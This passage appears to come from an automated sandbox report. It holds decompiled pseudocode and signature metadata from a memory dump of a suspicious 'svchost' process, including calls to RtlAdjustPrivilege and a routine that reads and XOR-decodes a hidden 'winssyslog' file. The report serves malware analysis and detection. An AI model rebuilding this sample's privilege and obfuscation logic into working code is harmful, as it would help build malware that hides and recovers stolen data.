                                                            				if (_t37 == 0) goto 0xaf5478a3;
                                                            				 *_t37 = 0x82;
                                                            				if (_a32 == 0) goto 0xaf5478a3;
                                                            				_t20 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t20;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t67 + 8)), _a32);
                                                            				return LocalFree(??);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeProcessSize$CloseEnumHandleOpenSleepTerminateWindows
                                                            • String ID:
                                                            • API String ID: 1695776769-0
                                                            • Opcode ID: 539b729410ae2bec23191c531da1d5be6d64cb916dcd22b47a22f34e3bf6bfcf
                                                            • Instruction ID: a2e3ef14b5ceeac73126cc7d4f60e70632041110da2e7908444dc8cf405c0f39
                                                            • Opcode Fuzzy Hash: 539b729410ae2bec23191c531da1d5be6d64cb916dcd22b47a22f34e3bf6bfcf
                                                            • Instruction Fuzzy Hash: ED219033B10B50A2EE26AF96F81C7D97792AB89BD1F0944249E4A07766DF39C041C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 30%
                                                            			E0000022B22BAF5454C0(long long __rbx, long long* __rcx, long long _a8) {
                                                            				int _t30;
                                                            				long long* _t37;
                                                            				void* _t56;
                                                            
                                                            				_a8 = __rbx;
                                                            				 *__rcx = 0xaf589380;
                                                            				_t37 = __rcx;
                                                            				ReleaseDC(??, ??);
                                                            				DeleteDC(??);
                                                            				DeleteDC(??);
                                                            				DeleteDC(??);
                                                            				DeleteDC(??);
                                                            				DeleteObject(??);
                                                            				DeleteObject(??);
                                                            				DeleteObject(??);
                                                            				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0xaf545542;
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(__rcx + 0x18)));
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(_t37 + 0x90)));
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(_t37 + 0x88)));
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(_t37 + 0x98)));
                                                            				 *((long long*)(_t37 + 0xc8)) = 0xaf589350;
                                                            				_t30 = DestroyCursor(??);
                                                            				if (_t56 - 1 != 0) goto 0xaf545580;
                                                            				return _t30;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$Object$CursorDestroyRelease
                                                            • String ID:
                                                            • API String ID: 1665608007-0
                                                            • Opcode ID: fd3f2206122930ae594cf7d479ca9f8b55fce53085fe4175d269b5f9c2402e21
                                                            • Instruction ID: ae32690824a280556f01373391ce255552cd431980cc8bf920c88cf684e34443
                                                            • Opcode Fuzzy Hash: fd3f2206122930ae594cf7d479ca9f8b55fce53085fe4175d269b5f9c2402e21
                                                            • Instruction Fuzzy Hash: C3217537611984A1EF52AFB5E89D3EC3361F784F99F044422DE0E4766ADF2AC84AC350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0000022B22BAF5658D0(void* __edx, signed short* __rax, long long __rbx, intOrPtr* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, intOrPtr _a16, long long _a24, long long _a32) {
                                                            				void* _v40;
                                                            				void* _v48;
                                                            				intOrPtr _v56;
                                                            				void* _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				intOrPtr _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				intOrPtr _v136;
                                                            				intOrPtr _v140;
                                                            				intOrPtr _v144;
                                                            				intOrPtr _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				intOrPtr _v164;
                                                            				intOrPtr _v168;
                                                            				void* _t133;
                                                            				void* _t165;
                                                            				void* _t189;
                                                            				void* _t192;
                                                            				signed short _t194;
                                                            				signed short _t195;
                                                            				signed short _t196;
                                                            				signed int _t197;
                                                            				signed int _t220;
                                                            				void* _t329;
                                                            				signed short* _t348;
                                                            				signed short* _t350;
                                                            				signed long long _t352;
                                                            				signed short* _t354;
                                                            				signed short* _t355;
                                                            				signed short* _t357;
                                                            				intOrPtr* _t358;
                                                            				long long _t366;
                                                            				long long* _t368;
                                                            				signed short* _t370;
                                                            				signed short* _t371;
                                                            				long long* _t374;
                                                            				long long* _t375;
                                                            				long long* _t379;
                                                            				long long* _t381;
                                                            				signed short** _t382;
                                                            				long long _t383;
                                                            				void* _t390;
                                                            				void* _t396;
                                                            
                                                            				_t390 = __r8;
                                                            				_t383 = __rsi;
                                                            				_t366 = __rbx;
                                                            				_a8 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_a32 = __rsi;
                                                            				r13d = 0;
                                                            				sil = r9b;
                                                            				r15d = r8d;
                                                            				_t382 = __rdx;
                                                            				if ( *__rdx != _t396) goto 0xaf565926;
                                                            				_t133 = E0000022B22BAF567054(__rax);
                                                            				 *__rax = 0x16;
                                                            				E0000022B22BAF564328(_t133);
                                                            				_t368 =  *((intOrPtr*)(__rdx + 8));
                                                            				if (_t368 == 0) goto 0xaf56591f;
                                                            				 *_t368 =  *__rdx;
                                                            				goto 0xaf566067;
                                                            				if (r8d == 0) goto 0xaf565934;
                                                            				_t5 = _t390 - 2; // 0x8
                                                            				if (_t5 - 0x22 > 0) goto 0xaf565900;
                                                            				_t379 = _t368;
                                                            				E0000022B22BAF56440C( *__rdx, __rbx,  &_v80, _t379);
                                                            				_v48 =  *_t382;
                                                            				goto 0xaf56596a;
                                                            				_t348 =  *_t382;
                                                            				_t194 =  *_t348 & 0x0000ffff;
                                                            				 *_t382 =  &(_t348[1]);
                                                            				if (E0000022B22BAF570338(_t194 & 0x0000ffff, 8, _t366,  &_v80) != 0) goto 0xaf565960;
                                                            				bpl = sil != 0;
                                                            				if (_t194 != 0x2d) goto 0xaf565990;
                                                            				goto 0xaf565996;
                                                            				if (_t194 != 0x2b) goto 0xaf5659a3;
                                                            				_t350 =  *_t382;
                                                            				_t195 =  *_t350 & 0x0000ffff;
                                                            				 *_t382 =  &(_t350[1]);
                                                            				_v84 = 0x66a;
                                                            				_a16 = 0xaf0;
                                                            				_v120 = 0xb66;
                                                            				_v160 = 0xb70;
                                                            				r11d = 0xff10;
                                                            				_v96 = 0xc66;
                                                            				_t14 = _t383 - 0x80; // 0x9e6
                                                            				r10d = _t14;
                                                            				_v152 = 0xc70;
                                                            				_v112 = 0xce6;
                                                            				r8d = 0x6f0;
                                                            				_v144 = 0xcf0;
                                                            				r9d = 0x966;
                                                            				_v88 = 0xd66;
                                                            				_v136 = 0xd70;
                                                            				_v104 = 0xe50;
                                                            				_v128 = 0xe5a;
                                                            				_v92 = 0xed0;
                                                            				_v168 = 0xeda;
                                                            				_v164 = 0xf20;
                                                            				_v156 = 0xf2a;
                                                            				_v148 = 0x1040;
                                                            				_v140 = 0x104a;
                                                            				_v132 = 0x17e0;
                                                            				_v124 = 0x17ea;
                                                            				_v116 = 0x1810;
                                                            				_v108 = 0x181a;
                                                            				_v100 = 0xff1a;
                                                            				if ((r15d & 0xffffffef) != 0) goto 0xaf565d3a;
                                                            				if (_t195 - 0x30 < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x3a >= 0) goto 0xaf565aae;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r11w >= 0) goto 0xaf565c49;
                                                            				if (_t195 - 0x660 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v84 >= 0) goto 0xaf565ad2;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r8w < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x6fa >= 0) goto 0xaf565af1;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r9w < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x970 >= 0) goto 0xaf565b10;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r10w < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x9f0 >= 0) goto 0xaf565b2f;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - 0xa66 < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0xa70 >= 0) goto 0xaf565b4c;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - (_t195 & 0x0000ffff) - 0xa66 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _a16 >= 0) goto 0xaf565b6c;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - _v120 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v160 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v96 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v152 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v112 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v144 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v88 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v136 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v104 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v128 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v92 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v168 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v164 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v156 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v148 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v140 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v132 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v124 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v116 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v108 >= 0) goto 0xaf565c60;
                                                            				goto 0xaf565ac8;
                                                            				if (_t195 - _v100 >= 0) goto 0xaf565c58;
                                                            				goto 0xaf565c5b;
                                                            				if (((_t195 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0xaf565c89;
                                                            				_t58 = _t366 - 0x41; // 0xfed9
                                                            				if (_t58 - 0x19 <= 0) goto 0xaf565c77;
                                                            				_t59 = _t366 - 0x61; // 0xfeb9
                                                            				if (_t59 - 0x19 <= 0) goto 0xaf565c77;
                                                            				goto 0xaf565c89;
                                                            				_t60 = _t366 - 0x61; // 0xfeaf
                                                            				if (_t60 - 0x19 > 0) goto 0xaf565c86;
                                                            				if ((_t195 & 0x0000ffff) - 0x20 + 0xffffffc9 == 0) goto 0xaf565c9d;
                                                            				if (r15d != 0) goto 0xaf565cec;
                                                            				_t61 = _t383 + 2; // 0xa
                                                            				r15d = _t61;
                                                            				goto 0xaf565cec;
                                                            				_t352 =  *_t382;
                                                            				r8d = 0xffdf;
                                                            				_t220 =  *_t352 & 0x0000ffff;
                                                            				_t62 = _t352 + 2; // 0xffe1
                                                            				_t370 = _t62;
                                                            				 *_t382 = _t370;
                                                            				_t63 = _t379 - 0x58; // 0x608
                                                            				if ((r8w & _t63) == 0) goto 0xaf565d22;
                                                            				r15d =  ==  ? 8 : r15d;
                                                            				_t371 =  &(_t370[0xffffffffffffffff]);
                                                            				 *_t382 = _t371;
                                                            				if (_t220 == 0) goto 0xaf565ce7;
                                                            				if ( *_t371 == _t220) goto 0xaf565ce7;
                                                            				_t165 = E0000022B22BAF567054(_t352);
                                                            				 *_t352 = 0x16;
                                                            				E0000022B22BAF564328(_t165);
                                                            				r11d = 0xff10;
                                                            				r13d = 0x660;
                                                            				r12d = 0x6f0;
                                                            				if (_t195 - 0x30 < 0) goto 0xaf565ee4;
                                                            				if (_t195 - 0x3a >= 0) goto 0xaf565d41;
                                                            				r8d = _t195 & 0x0000ffff;
                                                            				r8d = r8d - 0x30;
                                                            				goto 0xaf565ede;
                                                            				_t196 =  *_t371 & 0x0000ffff;
                                                            				r15d =  ==  ? 0x10 : r15d;
                                                            				_t70 =  &(_t371[1]); // 0xffe3
                                                            				_t354 = _t70;
                                                            				 *_t382 = _t354;
                                                            				goto 0xaf565ce7;
                                                            				goto 0xaf565cec;
                                                            				if (_t196 - r11w >= 0) goto 0xaf565eca;
                                                            				if (_t196 - r13w < 0) goto 0xaf565ee4;
                                                            				if (_t196 - 0x66a >= 0) goto 0xaf565d6b;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - r13d;
                                                            				goto 0xaf565ede;
                                                            				if (_t196 - r12w < 0) goto 0xaf565ee4;
                                                            				if (_t196 - 0x6fa >= 0) goto 0xaf565d8b;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - r12d;
                                                            				goto 0xaf565ede;
                                                            				if (_t196 - 0x966 < 0) goto 0xaf565ee4;
                                                            				_t71 =  &(_t354[5]); // 0x970
                                                            				r8d = _t71;
                                                            				if (_t196 - r8w >= 0) goto 0xaf565daf;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - 0x966;
                                                            				goto 0xaf565ede;
                                                            				if (_t196 - 0x9e6 < 0) goto 0xaf565ee4;
                                                            				_t72 =  &(_t354[5]); // 0x9f0
                                                            				r8d = _t72;
                                                            				if (_t196 - r8w < 0) goto 0xaf565da3;
                                                            				_t73 = _t390 + 0x76; // 0xa66
                                                            				if (_t196 - _t73 < 0) goto 0xaf565ee4;
                                                            				_t74 =  &(_t354[5]); // 0xa70
                                                            				r8d = _t74;
                                                            				if (_t196 - r8w < 0) goto 0xaf565da3;
                                                            				_t75 = _t390 + 0x76; // 0xae6
                                                            				if (_t196 - _t75 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _a16 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v120 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v160 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v96 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v152 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v112 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v144 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v88 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v136 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v104 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v128 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v92 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v168 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v164 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v156 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v148 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v140 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v132 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v124 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v116 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v108 >= 0) goto 0xaf565ee4;
                                                            				goto 0xaf565da3;
                                                            				if (_t196 - _v100 >= 0) goto 0xaf565eda;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - r11d;
                                                            				goto 0xaf565ede;
                                                            				r8d = r8d | 0xffffffff;
                                                            				if (r8d != 0xffffffff) goto 0xaf565f11;
                                                            				_t98 = _t366 - 0x41; // 0xfecf
                                                            				if (_t98 - 0x19 <= 0) goto 0xaf565efc;
                                                            				_t99 = _t366 - 0x61; // 0xfeaf
                                                            				if (_t99 - 0x19 <= 0) goto 0xaf565efc;
                                                            				r8d = r8d | 0xffffffff;
                                                            				goto 0xaf565f11;
                                                            				_t100 = _t366 - 0x61; // 0xfeaf
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				if (_t100 - 0x19 > 0) goto 0xaf565f0d;
                                                            				r8d = r8d - 0x20;
                                                            				r8d = r8d + 0xffffffc9;
                                                            				if (r8d == 0xffffffff) goto 0xaf565f56;
                                                            				if (r8d - r15d >= 0) goto 0xaf565f56;
                                                            				_t329 = _t396 - (_t352 | 0xffffffff);
                                                            				if (_t329 < 0) goto 0xaf565f32;
                                                            				if (_t329 != 0) goto 0xaf565f2d;
                                                            				if (_t354 - _t379 <= 0) goto 0xaf565f32;
                                                            				goto 0xaf565f44;
                                                            				r14d = r8d;
                                                            				_t355 =  *_t382;
                                                            				_t197 =  *_t355 & 0x0000ffff;
                                                            				 *_t382 =  &(_t355[1]);
                                                            				goto 0xaf565d07;
                                                            				 *_t382 =  &(( *_t382)[0xffffffffffffffff]);
                                                            				r13d = 0;
                                                            				_t357 =  *_t382;
                                                            				if (_t197 == 0) goto 0xaf565f82;
                                                            				if ( *_t357 == _t197) goto 0xaf565f82;
                                                            				_t189 = E0000022B22BAF567054(_t357);
                                                            				 *_t357 = 0x16;
                                                            				E0000022B22BAF564328(_t189);
                                                            				if ((sil & bpl) != 0) goto 0xaf565fa9;
                                                            				 *_t382 = _v48;
                                                            				if (_v56 == r13b) goto 0xaf565910;
                                                            				_t358 = _v80;
                                                            				 *(_t358 + 0x3a8) =  *(_t358 + 0x3a8) & 0xfffffffd;
                                                            				goto 0xaf565910;
                                                            				if (E0000022B22BAF564EB0(r13d | 0xe) == 0) goto 0xaf566036;
                                                            				_t192 = E0000022B22BAF567054(_t358);
                                                            				 *_t358 = 0x22;
                                                            				if ((bpl & 0x00000001) != 0) goto 0xaf565fce;
                                                            				goto 0xaf56603f;
                                                            				if ((bpl & 0x00000002) == 0) goto 0xaf566005;
                                                            				if (_v56 == r13b) goto 0xaf565fea;
                                                            				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                                                            				_t374 = _t382[1];
                                                            				if (_t374 == 0) goto 0xaf565ff9;
                                                            				 *_t374 =  *_t382;
                                                            				goto 0xaf566067;
                                                            				if (_v56 == r13b) goto 0xaf56601b;
                                                            				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                                                            				_t375 = _t382[1];
                                                            				if (_t375 == 0) goto 0xaf56602a;
                                                            				 *_t375 =  *_t382;
                                                            				goto 0xaf566067;
                                                            				if ((bpl & 0x00000002) == 0) goto 0xaf56603f;
                                                            				if (_v56 == r13b) goto 0xaf566055;
                                                            				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                                                            				_t381 = _t382[1];
                                                            				if (_t381 == 0) goto 0xaf566064;
                                                            				 *_t381 =  *_t382;
                                                            				return _t192;
                                                            			}
                                                            0x22baf565f1e
                                                            0x22baf565f21
                                                            0x22baf565f23
                                                            0x22baf565f2b
                                                            0x22baf565f30
                                                            0x22baf565f39
                                                            0x22baf565f44
                                                            0x22baf565f47
                                                            0x22baf565f4e
                                                            0x22baf565f51
                                                            0x22baf565f56
                                                            0x22baf565f5a
                                                            0x22baf565f5d
                                                            0x22baf565f6b
                                                            0x22baf565f70
                                                            0x22baf565f72
                                                            0x22baf565f77
                                                            0x22baf565f7d
                                                            0x22baf565f85
                                                            0x22baf565f87
                                                            0x22baf565f92
                                                            0x22baf565f98
                                                            0x22baf565f9d
                                                            0x22baf565fa4
                                                            0x22baf565fb5
                                                            0x22baf565fb7
                                                            0x22baf565fbc
                                                            0x22baf565fc6
                                                            0x22baf565fcc
                                                            0x22baf565fd2
                                                            0x22baf565fdc
                                                            0x22baf565fe3
                                                            0x22baf565fea
                                                            0x22baf565ff1
                                                            0x22baf565ff6
                                                            0x22baf566003
                                                            0x22baf56600d
                                                            0x22baf566014
                                                            0x22baf56601b
                                                            0x22baf566022
                                                            0x22baf566027
                                                            0x22baf566034
                                                            0x22baf56603a
                                                            0x22baf566047
                                                            0x22baf56604e
                                                            0x22baf566055
                                                            0x22baf56605c
                                                            0x22baf566061
                                                            0x22baf566087

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: +$-$f$p
                                                            • API String ID: 3215553584-588565063
                                                            • Opcode ID: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
                                                            • Instruction ID: 7a7207ea5ed3d08a3f4037af125e68f834d0731dd80f8120b2402623d1ed8c52
                                                            • Opcode Fuzzy Hash: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
                                                            • Instruction Fuzzy Hash: 3712A173674251A6FBB29AD4E14C3EAB762E340764FDC4212E6B5076C6CF3AC984CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53A9C0(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t44;
                                                            				signed long long _t53;
                                                            				long long _t72;
                                                            				void* _t75;
                                                            				signed short* _t76;
                                                            				void* _t78;
                                                            				signed long long _t79;
                                                            
                                                            				_t72 = __rdi;
                                                            				_t44 = __ecx;
                                                            				 *((long long*)(_t78 + 0x18)) = __rbx;
                                                            				_t76 = _t78 - 0x20;
                                                            				_t79 = _t78 - 0x120;
                                                            				_t53 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t76[8] = _t53 ^ _t79;
                                                            				 *((long long*)(_t79 + 0x138)) = __rdi;
                                                            				E0000022B22BAF538B60(_t53 ^ _t79, __rbx, _t79 + 0x60, __rdi, __rsi);
                                                            				 *((char*)(_t76 - 0x30)) = 0x43;
                                                            				 *((long long*)(_t76 - 0x50)) = _t72;
                                                            				 *((long long*)(_t76 - 0x58)) = 0xaf588810;
                                                            				 *((long long*)(_t76 - 0x40)) = _t72;
                                                            				 *((long long*)(_t76 - 0x48)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t76 - 8)) = 0;
                                                            				 *((long long*)(_t76 - 0x18)) = _t72;
                                                            				 *((long long*)(_t76 - 0x10)) = _t72;
                                                            				 *((intOrPtr*)(_t76 - 0x2c)) = 0;
                                                            				 *((long long*)(_t76 - 0x68)) = _t72;
                                                            				 *((long long*)(_t76 - 0x60)) = _t72;
                                                            				 *((long long*)(_t76 - 0x38)) = _t72;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t76 - 0x28)) = _t72;
                                                            				if (( *_t76 & 0x0000ffff) != 1) goto 0xaf53aaf4;
                                                            				 *((short*)(_t79 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t79 + 0x20)) = _t72;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x68))))))(_t75) != 0) goto 0xaf53ab5d;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t79 + 0x60);
                                                            				if ( *((intOrPtr*)(_t76 - 0x18)) == 0) goto 0xaf53aa9e;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x68)))),  *((intOrPtr*)(_t76 - 0x18)));
                                                            				 *((long long*)(_t76 - 0x48)) = 0xaf588690;
                                                            				 *((intOrPtr*)(_t76 - 8)) = 0;
                                                            				 *((long long*)(_t76 - 0x18)) = _t72;
                                                            				 *((long long*)(_t76 - 0x10)) = _t72;
                                                            				 *((long long*)(_t76 - 0x58)) = 0xaf588790;
                                                            				if ( *((intOrPtr*)(_t76 - 0x70)) == 0) goto 0xaf53aad5;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t76 - 0x70)));
                                                            				return E0000022B22BAF55A7C0(_t44, 0xaf588790, _t76[8] ^ _t79);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$CloseCreateEventHandleSleep
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 2473550723-64178277
                                                            • Opcode ID: 2ec4c8535db51ff328a987c50087f643e24a6386b0b8f521e7885347254c51fc
                                                            • Instruction ID: fba53a71ab8522ceb5c7d9a917a5bbda2ceb1f2b0872917a5b0e4a93393f8238
                                                            • Opcode Fuzzy Hash: 2ec4c8535db51ff328a987c50087f643e24a6386b0b8f521e7885347254c51fc
                                                            • Instruction Fuzzy Hash: B1717D37604B44A9EB22CFA4E8A83DD77B4FB84798F100616DA8D03BAADF39C145C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E0000022B22BAF53DB10(void* __rcx, long long __rdi, long long __rsi, long long __r14, long long _a16, long long _a24, long long _a32) {
                                                            				signed int _v40;
                                                            				char _v568;
                                                            				intOrPtr _v584;
                                                            				long long _v600;
                                                            				intOrPtr _v608;
                                                            				long long _v616;
                                                            				void* __rbx;
                                                            				signed int _t26;
                                                            				signed int _t55;
                                                            				void* _t56;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				signed long long _t64;
                                                            				signed long long _t65;
                                                            				signed char* _t66;
                                                            				long long _t68;
                                                            				long long _t86;
                                                            				signed long long _t93;
                                                            				void* _t95;
                                                            				void* _t99;
                                                            
                                                            				_t86 = __rdi;
                                                            				_t64 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t65 = _t64 ^ _t93;
                                                            				_v40 = _t65;
                                                            				_t99 = __rcx;
                                                            				_v584 = 0;
                                                            				r9d = 0;
                                                            				_t4 = _t68 + 8; // 0x8
                                                            				r8d = _t4;
                                                            				E0000022B22BAF549B50(_t68, L"winssyslog",  &_v568, _t95);
                                                            				_v600 = _t68;
                                                            				_t6 = _t68 + 1; // 0x1
                                                            				r8d = _t6;
                                                            				_v608 = 0x80;
                                                            				r9d = 0;
                                                            				_v616 = 3;
                                                            				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                            				if (_t65 == 0xffffffff) goto 0xaf53dca8;
                                                            				_a16 = __rsi;
                                                            				_a24 = __rdi;
                                                            				_a32 = __r14;
                                                            				_t26 = GetFileSize(??, ??);
                                                            				_t55 = _t26;
                                                            				r14d = _t26;
                                                            				E0000022B22BAF55A828(0, _t65);
                                                            				_v616 = _t68;
                                                            				r8d = _t55;
                                                            				ReadFile(??, ??, ??, ??, ??);
                                                            				if (_t55 == 0) goto 0xaf53dc3d;
                                                            				if (_t55 - 0x20 < 0) goto 0xaf53dc18;
                                                            				asm("movdqa xmm1, [0x4c48c]");
                                                            				asm("movdqu xmm0, [eax+esi]");
                                                            				asm("pxor xmm0, xmm1");
                                                            				asm("movdqu [eax+esi], xmm0");
                                                            				asm("movdqu xmm0, [eax+esi]");
                                                            				asm("pxor xmm0, xmm1");
                                                            				asm("movdqu [eax+esi], xmm0");
                                                            				if (0x20 - _t55 - (_t55 & 0x0000001f) < 0) goto 0xaf53dbf0;
                                                            				_t62 = 0x20 - _t55;
                                                            				if (_t62 >= 0) goto 0xaf53dc3d;
                                                            				_t66 = _t65 + _t65;
                                                            				asm("o16 nop [eax+eax]");
                                                            				 *_t66 =  *_t66 ^ 0x00000058;
                                                            				_t67 =  &(_t66[1]);
                                                            				if (_t62 != 0) goto 0xaf53dc30;
                                                            				_t17 = _t86 + 1; // 0x1
                                                            				LocalAlloc(??, ??);
                                                            				_t18 =  &(_t67[1]); // 0x1
                                                            				_t66[1] = 0x7f;
                                                            				E0000022B22BAF562BA0(0x40, _t55, _t56, _t57, _t18, _t65,  &(_t66[1]), _t65, __r14);
                                                            				r9b = 0x3f;
                                                            				r8d = _t17;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t99 + 8)), _t67);
                                                            				LocalFree(??);
                                                            				E0000022B22BAF55A7E4(_t67, _t65);
                                                            				CloseHandle(??);
                                                            				return E0000022B22BAF55A7C0(0x40, _t67, _v40 ^ _t93);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                            • String ID: winssyslog
                                                            • API String ID: 245316060-1874786851
                                                            • Opcode ID: 5b67b33968174e760cf79a53cf29cb5545573e63a39bffb90f0deaf9dd6e02fa
